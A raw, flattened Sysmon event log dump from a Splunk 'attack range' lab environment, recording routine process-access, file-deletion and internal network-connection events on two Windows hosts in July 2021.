Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=54F3F83FF475E7FACF7F5BF8D0DA2503,SHA256=D3CA90CD3E643880F1A244C3E1BE44730D6B458341D44B7E589A482FE9519B93,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807488Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:46.313{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57258-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807487Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:47.221{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF9178A401092AF1A3696CCA757017EB,SHA256=F9C08AABA650CFC981B6A3548F96B76E508D7BCD3A3B0C9F40B95BC9CABB83FF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.290{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+59c7f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b 10341000x80000000000000001048615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.290{466BC892-32D3-60E8-700B-00000000CF01}1664384C:\Windows\System32\sihost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.290{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048610Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048609Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048608Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048607Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048606Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048605Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048604Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048603Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048602Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:47.274{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c526|C:\Windows\SYSTEM32\resourcepolicyserver.dll+11927|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001048633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.988{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=38AE70479BA19550928E1A0096709099,SHA256=06A1546893D8C94E274F9B61BB6D5EEFFA7309747A2D92E1F7E449AD248EB13E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807489Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:51:48.223{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=287ABA4AC730726A33943EAD3FE517E9,SHA256=6EC82281A9401820C5E0A0F89708BD15EF612CB688858EEBAD8A9614543BB29C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:40.681{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51016-false10.0.1.12-8000- 10341000x80000000000000001048631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.536{466BC892-32D3-60E8-700B-00000000CF01}1664384C:\Windows\System32\sihost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+756d|C:\Windows\system32\activationmanager.dll+b93d|C:\Windows\System32\twinui.appcore.dll+3df1|C:\Windows\SYSTEM32\twinapi.appcore.dll+2accd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001048630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.536{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|c:\windows\system32\bisrv.dll+1d9ff|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x80000000000000001048629Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a384|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-F483-60EB-237D-00000000CF01}6996C:\Windows\system32\backgroundTaskHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:51:48.520{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+489d|C:\Windows\SYSTEM32\psmserviceexthost.dll+1a2ed|C:\Windows\SYSTEM32\psmserviceexthost.dll+11055|C:\Windows\SYSTEM32\psmserviceexthost.dll+108cf|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 